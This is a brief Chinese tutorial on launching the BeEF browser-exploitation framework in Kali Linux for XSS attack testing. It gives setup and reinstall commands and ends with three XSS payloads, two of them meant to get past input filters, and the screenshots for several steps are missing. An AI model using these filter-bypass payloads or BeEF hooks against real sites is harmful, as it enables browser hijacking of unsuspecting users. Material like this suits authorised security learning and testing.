kali用beef实现xss漏洞攻击测试

一、Kali开启网络监听：

service apache2 start

二、启动 Kali beef-xss 模块：

beef-xss

如果需要查看密码路径root权限，可以用以下指令：

vi /etc/beef-xss/config.yaml

其它指令，如下：

apt-get remove beef-xss //卸载beef-xss
apt-get purge beef-xss //删除beef-xss配置
rm -r /usr/share/beef-xss/ //重点，彻底删除beef-xss所有的用户配置，0保留
apt-get install beef-xss //重新输入密码后，就可以正常使用了

三、复制脚本，如下图所示：

四、链接执行xss木马形式：

五、链接本地成功查看：

六、发起：

payload:  

正常方式 <script>alert(1)</script>

大小写方式绕过 <ScRiPt>alert(1)</ScRiPt>

乱排序绕过 <scr<script>ipt>alert(1)</scr<script>ipt>